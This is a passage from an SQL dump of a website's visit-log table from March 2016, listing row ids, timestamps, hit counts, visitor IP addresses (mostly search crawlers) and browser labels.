,'other'),(16506,1457422200,1,1,0,0,'217.69.133.238','other'),(16507,1457422430,1,1,0,0,'37.187.94.219','other'),(16508,1457422546,49,0,49,0,'66.249.66.158',''),(16509,1457422676,1,1,0,0,'217.69.133.215','other'),(16510,1457422939,1,1,0,0,'217.69.133.221','other'),(16511,1457423188,1,1,0,0,'93.158.152.9','other'),(16512,1457423284,3,0,3,0,'66.249.66.162',''),(16513,1457423477,1,1,0,0,'51.255.65.18','other'),(16514,1457423811,1,1,0,0,'217.69.136.204','other'),(16515,1457424107,1,1,0,0,'51.255.65.60','other'),(16516,1457424187,1,1,0,0,'66.249.93.94','other'),(16517,1457424249,11,11,0,0,'141.8.184.18','other'),(16518,1457424251,1,1,0,0,'141.8.132.99','other'),(16519,1457424274,10,10,0,0,'178.154.149.11','other'),(16520,1457424278,3,3,0,0,'141.8.183.14','other'),(16521,1457424588,1,1,0,0,'217.69.136.206','other'),(16522,1457424598,7,0,7,0,'66.249.66.158',''),(16523,1457424637,3,0,3,0,'66.249.66.162',''),(16524,1457424657,1,1,0,0,'91.124.182.203','firefox'),(16525,1457424724,1,1,0,0,'217.69.143.58','other'),(16526,1457424916,1,0,1,0,'66.249.66.166',''),(16527,1457425298,1,1,0,0,'217.69.133.240','other'),(16528,1457425667,1,0,1,0,'68.180.229.232',''),(16529,1457425834,1,1,0,0,'178.93.148.66','chrome'),(16530,1457426059,1,1,0,0,'66.249.93.94','firefox'),(16531,1457426310,22,0,22,0,'66.249.66.158',''),(16532,1457426312,1,1,0,0,'89.67.240.30','chrome'),(16533,1457426627,1,1,0,0,'8.29.198.25','other'),(16534,1457426964,1,1,0,0,'46.160.80.117','chrome'),(16535,1457427130,2,2,0,0,'5.255.253.53','other'),(16536,1457427133,2,2,0,0,'130.193.37.21','other'),(16537,1457427134,2,2,0,0,'141.8.184.18','other'),(16538,1457427135,1,1,0,0,'141.8.183.14','other'),(16539,1457427140,1,1,0,0,'5.255.253.100','other'),(16540,1457427143,1,1,0,0,'178.154.149.11','other'),(16542,1457427145,1,1,0,0,'93.158.152.9','other'),(16543,1457427459,1,1,0,0,'217.69.133.69','other'),(16544,1457427749,1,1,0,0,'217.69.143.42','other'),(16545,1457427782,1,1,0,0,'217.69.143.46','other'),(16546,1457427930,1,1,0,0,'66.249.93.94','other'),(16547,1457428000,1,1,0,0,'217.69.133.239','other'),(16548,1457428109,1,0,1,0,'68.180.229.232',''),(16549,1457428928,1,1,0,0,'217.69.133.221','other'),(16550,1457428943,1,1,0,0,'217.69.133.229','other'),(16551,1457429153,1,1,0,0,'157.55.39.160','other'),(16552,1457429223,1,1,0,0,'217.69.133.238','other'),(16553,1457429243,1,0,1,0,'66.249.66.190',''),(16554,1457429363,2,0,2,0,'66.249.66.166',''),(16555,1457429588,1,0,1,0,'68.180.229.232',''),(16556,1457429630,1,1,0,0,'91.196.178.97','chrome'),(16557,1457429798,3,0,3,0,'66.249.66.162',''),(16558,1457429801,25,0,25,0,'66.249.66.158',''),(16559,1457429953,1,0,1,0,'66.249.66.133',''),(16560,1457429966,1,1,0,0,'217.69.136.203','other'),(16561,1457430265,1,1,0,0,'217.69.143.61','other'),(16562,1457430331,1,1,0,0,'217.69.136.204','other'),(16563,1457430757,1,1,0,0,'180.76.15.13','other'),(16564,1457430768,1,1,0,0,'217.69.133.235','other'),(16565,1457430843,1,0,1,0,'66.249.66.166',''),(16566,1457430982,1,1,0,0,'37.187.95.17','other'),(16567,1457431108,2,0,2,0,'68.180.229.232',''),(16568,1457431143,1,1,0,0,'217.69.133.230','other'),(16569,1457431409,1,1,0,0,'217.69.143.52','other'),(16570,1457431459,24,0,24,0,'66.249.66.158',''),(16571,1457431553,1,1,0,0,'66.249.93.90','other'),(16572,1457431714,2,0,2,0,'66.249.66.162',''),(16573,1457431829,1,1,0,0,'217.69.133.215','other'),(16574,1457431836,1,1,0,0,'51.255.65.33','other'),(16575,1457432041,1,0,1,0,'66.249.66.190',''),(16576,1457432312,3,0,3,0,'68.180.229.232',''),(16577,1457432461,1,1,0,0,'66.249.92.103','other'),(16578,1457432465,1,0,1,0,'66.249.66.158',''),(16579,1457433105,3,3,0,0,'141.8.184.18','other'),(16581,1457433106,4,4,0,0,'141.8.183.14','other'),(16582,1457433110,1,1,0,0,'93.158.152.9','other'),(16583,1457433118,1,1,0,0,'217.69.143.71','other'),(16584,1457433404,1,0,1,0,'66.249.66.166',''),(16585,1457433420,20,0,20,0,'66.249.66.158',''),(16586,1457433530,1,1,0,0,'217.69.133.218','other'),(16587,1457434429,1,0,1,0,'68.180.229.232',''),(16588,1457434503,1,1,0,0,'217.69.143.43','other'),(16589,1457434775,1,1,0,0,'180.76.15.137','other'),(16590,1457435077,1,1,0,0,'207.46.13.43','other'),(16591,1457435082,1,1,0,0,'66.249.93.90','other'),(16592,1457435426,1,1,0,0,'180.76.15.149','other'),(16593,1457436041,1,1,0,0,'46.55.23.55','chrome'),(16594,1457436074,1,1,0,0,'207.46.13.43','other'),(16595,1457436162,2,0,2,0,'66.249.66.162',''),(16596,1457436177,1,0,1,0,'66.249.66.158',''),(16597,1457436217,1,1,0,0,'217.69.133.240','other'),(16598,1457436218,1,1,0,0,'217.69.133.239','other'),(16599,1457436225,1,0,1,0,'66.249.66.129',''),(16600,1457436540,1,1,0,0,'37.187.95.140','other'),(16601,1457437292,1,1,0,0,'51.255.65.9','other'),(16602,1457437440,1,1,0,0,'8.29.198.25','other'),(16603,1457437444,2,0,2,0,'66.249.66.162',''),(16604,1457437501,1,0,1,0,'66.249.66.158',''),(16605,1457437846,5,5,0,0,'82.193.127.15','other'),(16606,1457438107,1,0,1,0,'66.249.66.190',''),(16607,1457438421,2,0,2,0,'66.249.66.158',''),(16608,1457438471,1,1,0,0,'66.249.93.86','other'),(16609,1457438472,1,1,0,0,'217.69.143.52','other'),(16611,1457438875,1,1,0,0,'217.69.136.204','other'),(16612,1457438883,1,1,0,0,'217.69.143.69','other'),(16613,1457439023,1,0,1,0,'68.180.229.232',''),(16614,1457439144,4,4,0,0,'141.8.184.18','other'),(16615,1457439147,3,3,0,0,'141.8.183.14','other'),(16616,1457439150,1,1,0,0,'178.154.149.11','other'),(16617,1457439175,1,0,1,0,'66.249.66.162',''),(16618,1457439319,4,4,0,0,'82.193.127.15','other'),(16619,1457439405,1,0,1,0,'66.249.66.166',''),(16620,1457439924,1,1,0,0,'217.69.133.234','other'),(16621,1457439925,1,1,0,0,'217.69.133.236','other'),(16622,1457440759,6,0,6,0,'66.249.66.166',''),(16623,1457441233,1,0,1,0,'68.180.229.232',''),(16624,1457441307,1,1,0,0,'217.69.133.221','other'),(16626,1457441332,2,0,2,0,'66.249.66.162',''),(16627,1457441753,1,1,0,0,'217.69.143.64','other'),(16628,1457441781,4,0,4,0,'66.249.66.158',''),(16629,1457442046,1,1,0,0,'66.249.93.94','other'),(16630,1457442149,2,0,2,0,'66.249.66.166',''),(16631,1457442180,2,0,2,0,'68.180.229.232',''),(16632,1457442243,2,2,0,0,'141.8.184.18','other'),(16633,1457442247,7,7,0,0,'178.154.149.11','other'),(16634,1457442252,5,5,0,0,'141.8.183.14','other'),(16635,1457442276,2,2,0,0,'93.158.152.9','other'),(16636,1457442469,1,1,0,0,'5.255.253.53','other'),(16637,1457442904,1,1,0,0,'217.69.136.208','other'),(16638,1457442941,1,1,0,0,'66.249.92.99','other'),(16639,1457443094,1,1,0,0,'51.255.65.14','other'),(16640,1457443097,1,1,0,0,'217.69.143.64','other'),(16641,1457443751,2,0,2,0,'66.249.66.162',''),(16642,1457443781,1,1,0,0,'51.255.65.89','other'),(16643,1457443862,1,0,1,0,'66.249.66.133',''),(16644,1457443950,1,1,0,0,'51.255.65.84','other'),(16645,1457443967,1,1,0,0,'91.196.178.35','chrome'),(16646,1457444418,1,1,0,0,'178.154.149.11','other'),(16647,1457444791,1,0,1,0,'68.180.229.232',''),(16648,1457444896,3,0,3,0,'66.249.66.158',''),(16649,1457445173,1,1,0,0,'217.69.143.67','other'),(16650,1457445475,1,1,0,0,'217.69.143.45','other'),(16651,1457445703,3,0,3,0,'66.249.66.162',''),(16652,1457445743,1,0,1,0,'66.249.66.166',''),(16653,1457445747,1,1,0,0,'217.69.143.61','other'),(16654,1457445808,1,1,0,0,'217.69.136.208','other'),(16655,1457446209,3,3,0,0,'178.154.189.204','other'),(16656,1457446312,1,1,0,0,'37.187.95.132','other'),(16657,1457446327,1,1,0,0,'94.179.15.52','chrome'),(16658,1457446524,1,1,0,0,'91.124.182.203','firefox'),(16659,1457446621,1,0,1,0,'66.249.66.162',''),(16660,1457446660,2,0,2,0,'66.249.66.129',''),(16661,1457447006,3,1,2,0,'66.249.66.166',''),(16662,1457447034,2,0,2,0,'66.249.66.158',''),(16663,1457447119,1,1,0,0,'37.187.95.217','other'),(16664,1457447135,2,2,0,0,'66.249.66.133','other'),(16665,1457447353,1,1,0,0,'130.193.51.55','other'),(16666,1457447356,2,2,0,0,'178.154.149.11','other'),(16667,1457447360,1,1,0,0,'93.158.152.9','other'),(16668,1457447364,1,1,0,0,'5.255.253.53','other'),(16669,1457447369,2,2,0,0,'130.193.37.21','other'),(16670,1457447373,1,1,0,0,'141.8.132.99','other'),(16671,1457447377,2,2,0,0,'130.193.51.45','other'),(16672,1457447381,1,1,0,0,'130.193.51.43','other'),(16673,1457447385,1,1,0,0,'5.255.253.10','other'),(16674,1457447390,1,1,0,0,'93.158.152.26','other'),(16675,1457447402,1,1,0,0,'141.8.132.97','other'),(16676,1457447411,1,1,0,0,'141.8.142.41','other'),(16677,1457447430,1,1,0,0,'217.69.133.220','other'),(16678,1457447577,1,1,0,0,'80.82.64.109','chrome'),(16679,1457447603,8,8,0,0,'141.8.184.18','other'),(16680,1457447680,1,0,1,0,'66.249.66.190',''),(16681,1457447786,1,1,0,0,'37.187.95.103','other'),(16682,1457447854,1,1,0,0,'157.55.39.70','other'),(16683,1457447908,1,1,0,0,'178.93.148.69','chrome'),(16684,1457447911,1,1,0,0,'217.69.133.237','other'),(16685,1457448039,3,0,3,0,'66.249.66.162',''),(16686,1457448051,1,1,0,0,'37.187.94.65','other'),(16687,1457448098,1,1,0,0,'66.249.66.166','other'),(16688,1457448202,1,1,0,0,'217.69.133.238','other'),(16689,1457448209,1,1,0,0,'217.69.133.233','other'),(16690,1457448265,3,0,3,0,'66.249.66.158',''),(16691,1457448317,1,1,0,0,'8.29.198.26','other'),(16692,1457448523,1,0,1,0,'68.180.229.232',''),(16693,1457448525,1,1,0,0,'207.46.13.171','other'),(16694,1457448538,1,1,0,0,'66.249.66.158','other'),(16695,1457448578,1,1,0,0,'66.249.66.133','other'),(16696,1457449074,1,1,0,0,'66.249.66.190','other'),(16697,1457449086,1,1,0,0,'51.255.65.69','other'),(16698,1457449148,1,1,0,0,'130.193.51.43','other'),(16699,1457449263,1,1,0,0,'5.255.253.30','other'),(16700,1457449267,1,1,0,0,'5.255.253.10','other'),(16701,1457449271,1,1,0,0,'130.193.51.85','other'),(16702,1457449276,1,1,0,0,'141.8.184.18','other'),(16703,1457449281,1,1,0,0,'130.193.51.45','other'),(16704,1457449285,1,1,0,0,'130.193.51.102','other'),(16705,1457449288,1,1,0,0,'141.8.142.8','other'),(16706,1457449292,1,1,0,0,'178.154.149.11','other'),(16707,1457449395,1,1,0,0,'37.73.227.118','msie'),(16708,1457449463,1,1,0,0,'217.69.133.217','other'),(16709,1457449904,3,1,2,0,'66.249.66.158',''),(16710,1457449940,5,1,4,0,'66.249.66.162',''),(16711,1457450051,1,1,0,0,'66.249.66.133','other'),(16712,1457450240,1,0,1,0,'66.249.66.166',''),(16713,1457450829,84,84,0,0,'94.154.239.69','other'),(16714,1457450925,1,0,1,0,'66.249.66.162',''),(16715,1457451092,1,1,0,0,'51.255.65.68','other'),(16716,1457451156,1,1,0,0,'217.69.143.55','other'),(16717,1457451158,1,1,0,0,'217.69.143.53','other'),(16718,1457451212,41,41,0,0,'109.87.138.56','other'),(16719,1457451921,1,0,1,0,'66.249.66.129',''),(16720,1457451926,1,1,0,0,'141.8.132.97','other'),(16721,1457452425,1,1,0,0,'217.69.136.207','other'),(16722,1457452430,1,0,1,0,'66.249.66.158',''),(16723,1457452519,3,2,1,0,'66.249.66.166',''),(16724,1457452547,1,1,0,0,'66.249.66.129','other'),(16725,1457452666,1,1,0,0,'217.69.133.220','other'),(16726,1457452840,2,1,1,0,'66.249.66.158',''),(16727,1457452872,1,1,0,0,'157.55.39.70','other'),(16728,1457453134,2,1,1,0,'66.249.66.162',''),(16729,1457453151,1,1,0,0,'192.210.144.178','firefox'),(16730,1457453175,4,4,0,0,'66.249.66.162','other'),(16731,1457453206,2,1,1,0,'66.249.66.158',''),(16732,1457453506,1,1,0,0,'178.154.189.204','other'),(16733,1457453691,1,1,0,0,'66.249.92.95','other'),(16734,1457453818,1,1,0,0,'37.187.95.183','other'),(16735,1457453859,1,1,0,0,'157.55.39.160','other'),(16736,1457453861,1,1,0,0,'217.69.133.218','other'),(16737,1457453870,1,1,0,0,'66.249.66.190','other'),(16738,1457453889,3,3,0,0,'66.249.66.158','other'),(16739,1457453985,5,5,0,0,'178.154.149.11','other'),(16740,1457453989,5,5,0,0,'141.8.184.18','other'),(16741,1457454221,2,1,1,0,'66.249.66.162',''),(16742,1457454296,3,3,0,0,'66.249.66.166','other'),(16743,1457454327,2,0,2,0,'66.249.66.129',''),(16744,1457454371,1,1,0,0,'195.238.108.90','firefox'),(16745,1457454427,1,1,0,0,'157.55.39.70','other'),(16746,1457454609,3,2,1,0,'66.249.66.162',''),(16747,1457454743,3,3,0,0,'93.158.152.9','other'),(16748,1457454748,6,6,0,0,'141.8.183.14','other'),(16749,1457454756,2,0,2,0,'68.180.229.232',''),(16750,1457454775,1,1,0,0,'217.69.133.67','other'),(16751,1457454777,1,1,0,0,'217.69.133.85','other'),(16752,1457454869,4,0,4,0,'66.249.66.158',''),(16753,1457454903,12,12,0,0,'141.8.184.18','other'),(16754,1457454907,4,4,0,0,'178.154.149.11','other'),(16755,1457455020,2,2,0,0,'66.249.66.162','other'),(16756,1457455129,1,1,0,0,'176.213.32.27','chrome'),(16757,1457455319,1,1,0,0,'5.255.253.100','other'),(16758,1457455634,2,0,2,0,'66.249.66.166',''),(16759,1457455675,1,0,1,0,'66.249.66.133',''),(16760,1457455678,13,13,0,0,'141.8.183.14','other'),(16761,1457455911,20,20,0,0,'141.8.184.18','other'),(16762,1457455942,8,8,0,0,'93.158.152.9','other'),(16763,1457455945,12,12,0,0,'178.154.149.11','other'),(16764,1457455948,4,4,0,0,'5.255.253.53','other'),(16765,1457456072,1,1,0,0,'217.69.133.70','other'),(16766,1457456216,1,0,1,0,'66.249.66.158',''),(16767,1457456312,2,0,2,0,'66.249.66.162',''),(16768,1457456324,1,1,0,0,'66.249.66.158','other'),(16769,1457456862,3,3,0,0,'141.8.184.18','other'),(16770,1457456864,2,2,0,0,'5.255.253.53','other'),(16771,1457456865,2,2,0,0,'178.154.149.11','other'),(16772,1457457029,2,0,2,0,'66.249.66.166',''),(16773,1457457146,1,1,0,0,'141.8.183.14','other'),(16774,1457457478,1,0,1,0,'66.249.66.162',''),(16775,1457457527,1,1,0,0,'130.193.51.85','other'),(16776,1457457528,1,1,0,0,'130.193.37.21','other'),(16777,1457457529,2,2,0,0,'130.193.51.43','other'),(16778,1457457869,4,4,0,0,'130.193.51.81','other'),(16780,1457458016,2,2,0,0,'93.158.152.26','other'),(16781,1457458017,3,3,0,0,'141.8.184.22','other'),(16782,1457458025,2,2,0,0,'141.8.132.79','other'),(16783,1457458027,2,2,0,0,'141.8.132.99','other'),(16785,1457458029,4,4,0,0,'141.8.142.10','other'),(16786,1457458032,1,1,0,0,'141.8.142.88','other'),(16787,1457458034,2,2,0,0,'141.8.184.18','other'),(16788,1457458036,3,3,0,0,'5.255.253.100','other'),(16789,1457458041,1,1,0,0,'141.8.132.76','other'),(16790,1457458042,5,5,0,0,'141.8.142.41','other'),(16791,1457458043,2,2,0,0,'178.154.149.11','other'),(16792,1457458047,2,2,0,0,'5.255.253.9','other'),(16793,1457458048,3,3,0,0,'5.255.253.110','other'),(16794,1457458049,2,2,0,0,'5.255.253.55','other'),(16796,1457458051,1,1,0,0,'93.158.152.9','other'),(16797,1457458052,1,1,0,0,'141.8.132.2','other'),(16798,1457458053,1,0,1,0,'66.249.66.166',''),(16799,1457458074,2,0,2,0,'66.249.66.158',''),(16800,1457458076,2,2,0,0,'5.255.253.53','other'),(16801,1457458245,1,1,0,0,'217.69.133.228','other'),(16802,1457458390,1,1,0,0,'91.124.182.203','firefox'),(16803,1457458419,1,0,1,0,'68.180.229.232',''),(16804,1457458496,1,1,0,0,'51.255.65.47','other'),(16805,1457458603,1,1,0,0,'130.193.51.45','other'),(16806,1457458604,1,1,0,0,'130.193.51.43','other'),(16807,1457458606,1,1,0,0,'141.8.132.97','other'),(16808,1457458607,1,1,0,0,'178.154.149.9','other'),(16809,1457458609,1,1,0,0,'5.255.253.30','other'),(16810,1457458610,1,1,0,0,'37.187.94.84','other'),(16811,1457458612,2,2,0,0,'130.193.51.85','other'),(16812,1457458626,1,1,0,0,'5.255.253.10','other'),(16813,1457458629,1,1,0,0,'130.193.51.102','other'),(16815,1457458631,1,1,0,0,'141.8.183.14','other'),(16816,1457458632,1,1,0,0,'130.193.37.21','other'),(16817,1457458676,1,1,0,0,'37.187.95.208','other'),(16818,1457459103,1,1,0,0,'37.187.95.188','other'),(16819,1457459203,1,1,0,0,'8.29.198.26','other'),(16820,1457459346,1,1,0,0,'217.69.136.205','other'),(16821,1457459386,1,1,0,0,'141.8.142.8','other'),(16822,1457459575,1,1,0,0,'217.69.133.218','other'),(16823,1457459708,1,1,0,0,'37.187.95.11','other'),(16824,1457459801,1,1,0,0,'51.255.65.91','other'),(16825,1457459838,1,1,0,0,'37.187.95.17','other'),(16826,1457459952,2,0,2,0,'66.249.66.158',''),(16827,1457459990,1,0,1,0,'68.180.229.232',''),(16828,1457460067,2,0,2,0,'66.249.66.166',''),(16829,1457460159,3,3,0,0,'76.79.203.78','other'),(16830,1457460327,2,0,2,0,'66.249.66.162',''),(16831,1457460527,1,1,0,0,'217.69.143.54','other'),(16832,1457460606,1,1,0,0,'217.69.133.224','other'),(16833,1457460963,1,1,0,0,'141.8.132.99','other'),(16834,1457460964,1,1,0,0,'5.255.253.100','other'),(16835,1457461040,1,1,0,0,'93.158.152.26','other'),(16837,1457461041,1,1,0,0,'130.193.51.102','other'),(16838,1457461105,1,1,0,0,'51.255.65.92','other'),(16839,1457461170,1,1,0,0,'217.69.143.51','other'),(16840,1457461675,1,0,1,0,'66.249.66.158',''),(16841,1457461919,1,0,1,0,'68.180.229.232',''),(16842,1457462055,2,0,2,0,'66.249.66.166',''),(16843,1457462195,1,1,0,0,'217.69.143.58','other'),(16844,1457462237,1,1,0,0,'217.69.143.47','other'),(16845,1457462488,1,1,0,0,'37.187.94.96','other'),(16846,1457462930,3,0,3,0,'66.249.66.158',''),(16847,1457462931,1,1,0,0,'217.69.133.223','other'),(16848,1457462933,1,0,1,0,'66.249.66.162',''),(16849,1457463175,1,1,0,0,'217.69.133.228','other'),(16850,1457463348,1,1,0,0,'5.255.253.55','other'),(16852,1457463349,2,2,0,0,'130.193.51.85','other'),(16853,1457463352,1,1,0,0,'5.255.253.51','other'),(16854,1457463354,1,1,0,0,'5.255.253.89','other'),(16855,1457463355,1,1,0,0,'130.193.51.109','other'),(16856,1457463356,1,1,0,0,'37.140.178.250','other'),(16858,1457463357,3,3,0,0,'141.8.184.18','other'),(16859,1457463358,1,1,0,0,'141.8.132.99','other'),(16860,1457463406,1,1,0,0,'130.193.51.81','other'),(16861,1457463407,1,1,0,0,'141.8.142.88','other'),(16862,1457463410,1,1,0,0,'141.8.132.76','other'),(16864,1457463411,1,1,0,0,'5.255.253.53','other'),(16865,1457463412,1,1,0,0,'141.8.183.14','other'),(16866,1457463478,1,0,1,0,'68.180.229.232',''),(16867,1457463766,1,1,0,0,'217.69.143.43','other'),(16868,1457464373,1,1,0,0,'207.46.13.43','other'),(16869,1457464639,13,0,13,0,'66.249.66.158',''),(16870,1457464652,1,0,1,0,'66.249.66.162',''),(16871,1457464708,2,0,2,0,'68.180.229.232',''),(16872,1457464798,1,1,0,0,'180.76.15.29','other'),(16873,1457464862,1,1,0,0,'66.249.92.95','other'),(16874,1457465513,3,0,3,0,'66.249.66.166',''),(16875,1457465714,1,1,0,0,'178.154.189.204','other'),(16876,1457465878,1,0,1,0,'66.249.66.162',''),(16877,1457465956,1,1,0,0,'217.69.143.59','other'),(16878,1457465958,1,1,0,0,'217.69.143.54','other'),(16879,1457466209,1,0,1,0,'66.249.66.129',''),(16880,1457466286,1,1,0,0,'37.187.95.104','other'),(16881,1457466300,1,1,0,0,'95.135.91.115','firefox'),(16882,1457466324,1,1,0,0,'141.8.184.22','other'),(16883,1457466326,1,1,0,0,'141.8.132.97','other'),(16885,1457466327,1,1,0,0,'5.255.253.110','other'),(16886,1457466328,1,1,0,0,'5.255.253.30','other'),(16887,1457466329,1,1,0,0,'5.255.253.55','other'),(16889,1457466330,1,1,0,0,'130.193.37.27','other'),(16890,1457466331,1,1,0,0,'141.8.142.41','other'),(16891,1457466332,1,1,0,0,'130.193.51.85','other'),(16893,1457466333,1,1,0,0,'141.8.132.66','other'),(16894,1457466334,5,5,0,0,'141.8.184.18','other'),(16895,1457466335,5,5,0,0,'141.8.183.14','other'),(16896,1457466336,3,3,0,0,'93.158.152.9','other'),(16897,1457466337,1,1,0,0,'5.255.253.53','other'),(16899,1457466338,2,2,0,0,'5.255.253.100','other'),(16900,1457466340,4,4,0,0,'178.154.149.11','other'),(16901,1457466554,1,0,1,0,'66.249.66.166',''),(16902,1457466797,1,1,0,0,'66.249.66.178','other'),(16903,1457466850,1,1,0,0,'217.69.133.215','other'),(16904,1457466888,1,1,0,0,'157.55.39.70','other'),(16905,1457467020,1,1,0,0,'51.255.65.33','other'),(16906,1457467064,3,0,3,0,'66.249.66.158',''),(16907,1457467113,3,0,3,0,'66.249.66.162',''),(16908,1457467295,1,1,0,0,'51.255.65.19','other'),(16909,1457467828,1,1,0,0,'207.46.13.171','other'),(16910,1457467878,1,0,1,0,'66.249.66.166',''),(16911,1457468058,2,2,0,0,'141.8.184.18','other'),(16912,1457468092,1,1,0,0,'37.187.94.225','other'),(16913,1457468175,2,0,2,0,'66.249.66.158',''),(16914,1457468664,1,0,1,0,'66.249.66.186',''),(16915,1457468697,4,4,0,0,'178.151.143.163','other'),(16916,1457469628,1,1,0,0,'217.69.143.69','other'),(16917,1457469629,1,1,0,0,'217.69.143.70','other'),(16918,1457469649,1,1,0,0,'217.69.136.205','other'),(16919,1457469671,2,0,2,0,'66.249.66.186',''),(16920,1457470016,1,1,0,0,'66.249.66.178','other'),(16921,1457470021,1,1,0,0,'217.69.133.216','other'),(16922,1457470157,1,1,0,0,'5.255.253.53','other'),(16923,1457470159,1,1,0,0,'141.8.184.18','other'),(16924,1457470275,1,1,0,0,'8.29.198.25','other'),(16925,1457470445,1,1,0,0,'217.69.133.68','other'),(16926,1457470469,1,1,0,0,'217.69.133.225','other'),(16927,1457470672,1,1,0,0,'217.69.133.232','other'),(16928,1457470713,1,0,1,0,'66.249.66.134',''),(16929,1457470828,1,0,1,0,'66.249.66.130',''),(16930,1457471049,1,1,0,0,'217.69.133.236','other'),(16931,1457471184,1,1,0,0,'217.69.143.67','other'),(16932,1457471323,1,1,0,0,'217.69.143.60','other'),(16933,1457472166,1,0,1,0,'66.249.66.134',''),(16934,1457472408,2,2,0,0,'217.69.133.85','other'),(16935,1457472409,1,1,0,0,'217.69.133.84','other'),(16936,1457472627,2,0,2,0,'66.249.66.130',''),(16937,1457472707,4,4,0,0,'141.8.184.31','other'),(16938,1457472710,2,2,0,0,'5.255.253.89','other'),(16939,1457472711,2,2,0,0,'5.255.253.53','other'),(16940,1457472712,4,4,0,0,'141.8.184.11','other'),(16941,1457472851,1,0,1,0,'66.249.66.186',''),(16942,1457472961,3,3,0,0,'5.255.253.10','other'),(16943,1457472962,2,2,0,0,'141.8.184.22','other'),(16945,1457472963,2,2,0,0,'5.255.253.51','other'),(16946,1457472964,2,2,0,0,'5.255.253.94','other'),(16947,1457472965,3,3,0,0,'141.8.132.109','other'),(16949,1457472966,3,3,0,0,'130.193.50.22','other'),(16950,1457472967,3,3,0,0,'93.158.152.65','other'),(16951,1457472969,2,2,0,0,'141.8.132.48','other'),(16952,1457472970,1,1,0,0,'141.8.184.18','other'),(16953,1457472972,4,4,0,0,'141.8.132.97','other'),(16954,1457472973,2,2,0,0,'141.8.132.76','other'),(16956,1457472975,3,3,0,0,'141.8.132.44','other'),(16957,1457472977,1,1,0,0,'178.154.149.11','other'),(16958,1457472979,3,3,0,0,'130.193.51.43','other'),(16959,1457472983,2,2,0,0,'178.154.189.12','other'),(16960,1457472986,3,3,0,0,'130.193.51.109','other'),(16962,1457472987,2,2,0,0,'130.193.51.81','other'),(16963,1457472988,2,2,0,0,'5.255.253.110','other'),(16964,1457472990,2,2,0,0,'141.8.132.74','other'),(16965,1457472991,3,3,0,0,'141.8.184.6','other'),(16968,1457472992,2,2,0,0,'141.8.132.66','other'),(16971,1457472993,1,1,0,0,'130.193.51.45','other'),(16972,1457472996,1,1,0,0,'5.255.253.30','other'),(16973,1457473001,2,2,0,0,'141.8.142.82','other'),(16974,1457473005,2,2,0,0,'141.8.142.55','other'),(16975,1457473006,1,1,0,0,'141.8.142.60','other'),(16977,1457473016,1,1,0,0,'130.193.51.22','other'),(16978,1457473018,1,1,0,0,'141.8.132.2','other'),(16979,1457473261,1,0,1,0,'66.249.66.178',''),(16980,1457473490,1,1,0,0,'217.69.133.234','other'),(16981,1457473948,3,0,3,0,'66.249.66.134',''),(16982,1457473999,1,1,0,0,'217.69.133.232','other'),(16983,1457474645,1,0,1,0,'68.180.229.232',''),(16984,1457474789,1,1,0,0,'37.187.94.114','other'),(16985,1457474856,1,0,1,0,'66.249.66.178',''),(16986,1457474950,1,1,0,0,'93.158.152.9','other'),(16987,1457474951,1,1,0,0,'130.193.51.45','other'),(16988,1457474952,1,1,0,0,'141.8.184.22','other'),(16989,1457474954,1,1,0,0,'5.255.253.30','other'),(16991,1457474955,1,1,0,0,'141.8.132.44','other'),(16992,1457474956,1,1,0,0,'5.255.253.110','other'),(16993,1457474957,1,1,0,0,'141.8.132.79','other'),(16995,1457474958,2,2,0,0,'130.193.37.21','other'),(16996,1457474959,1,1,0,0,'178.154.149.11','other'),(16997,1457475109,1,1,0,0,'217.69.133.230','other'),(16998,1457475272,1,1,0,0,'51.255.65.52','other'),(16999,1457475348,1,1,0,0,'37.187.94.210','other'),(17000,1457475354,1,0,1,0,'66.249.66.130',''),(17001,1457475382,1,1,0,0,'87.76.241.232','chrome'),(17002,1457475569,1,1,0,0,'217.69.133.226','other'),(17003,1457475748,1,1,0,0,'37.187.95.220','other'),(17004,1457475781,1,0,1,0,'66.249.66.186',''),(17005,1457475831,1,1,0,0,'180.76.15.22','other'),(17006,1457475872,1,1,0,0,'66.249.92.71','other'),(17007,1457476431,1,1,0,0,'217.69.133.219','other'),(17009,1457476767,1,1,0,0,'51.255.65.83','other'),(17010,1457476944,1,1,0,0,'62.210.148.246','other'),(17011,1457476999,1,1,0,0,'217.69.133.69','other'),(17012,1457477021,1,1,0,0,'51.255.65.94','other'),(17013,1457477050,1,0,1,0,'66.249.66.186',''),(17014,1457477173,2,0,2,0,'68.180.229.232',''),(17015,1457477242,2,2,0,0,'93.158.152.9','other'),(17017,1457477313,1,1,0,0,'178.154.149.11','other'),(17019,1457477315,1,1,0,0,'141.8.183.14','other'),(17020,1457477393,1,1,0,0,'207.46.13.43','other'),(17021,1457477593,1,0,1,0,'66.249.66.134',''),(17022,1457477636,1,1,0,0,'217.69.133.222','other'),(17023,1457477671,1,1,0,0,'51.255.65.32','other'),(17024,1457477699,2,0,2,0,'66.249.66.130',''),(17025,1457477710,1,1,0,0,'217.69.133.240','other'),(17026,1457477711,1,1,0,0,'217.69.133.239','other'),(17027,1457478192,1,0,1,0,'66.249.66.186',''),(17028,1457478719,2,2,0,0,'207.46.13.43','other'),(17029,1457478763,1,1,0,0,'104.236.127.19','other'),(17030,1457478918,1,1,0,0,'213.180.206.205','other'),(17031,1457478921,1,0,1,0,'66.249.66.130',''),(17032,1457478939,1,1,0,0,'66.249.66.130','other'),(17033,1457478955,7,7,0,0,'66.249.66.186','other'),(17034,1457479008,1,1,0,0,'66.249.66.178','other'),(17035,1457479512,1,1,0,0,'74.91.26.114','firefox'),(17036,1457479940,1,1,0,0,'157.55.39.70','other'),(17037,1457480440,1,1,0,0,'37.187.95.13','other'),(17038,1457481061,3,0,3,0,'66.249.66.158',''),(17039,1457481113,1,1,0,0,'8.29.198.26','other'),(17040,1457481321,2,2,0,0,'141.8.184.18','other'),(17042,1457481322,1,1,0,0,'130.193.37.21','other'),(17043,1457481324,1,1,0,0,'178.154.149.11','other'),(17044,1457481381,1,0,1,0,'68.180.229.232',''),(17045,1457481485,1,1,0,0,'157.55.39.160','other'),(17046,1457481500,1,1,0,0,'130.193.51.85','other'),(17047,1457481501,1,1,0,0,'141.8.142.55','other'),(17048,1457481502,1,1,0,0,'141.8.132.44','other'),(17049,1457481503,1,1,0,0,'130.193.50.22','other'),(17050,1457481504,1,1,0,0,'5.255.253.30','other'),(17051,1457481605,1,0,1,0,'66.249.66.133',''),(17052,1457481731,3,0,3,0,'66.249.66.162',''),(17053,1457481870,2,2,0,0,'217.69.136.204','other'),(17054,1457482016,1,1,0,0,'37.187.94.193','other'),(17055,1457482212,1,1,0,0,'37.187.94.33','other'),(17056,1457482582,1,1,0,0,'217.69.133.230','o